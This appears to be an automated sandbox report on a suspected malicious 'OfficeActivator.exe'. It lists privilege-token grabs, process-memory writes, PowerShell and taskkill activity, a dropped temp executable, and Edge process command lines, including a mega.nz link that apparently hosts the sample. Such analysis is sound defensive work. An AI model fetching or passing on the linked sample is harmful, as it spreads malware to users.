N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4640 wrote to memory of 2752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 1168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 2128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc36c046f8,0x7ffc36c04708,0x7ffc36c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x508 0x3cc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

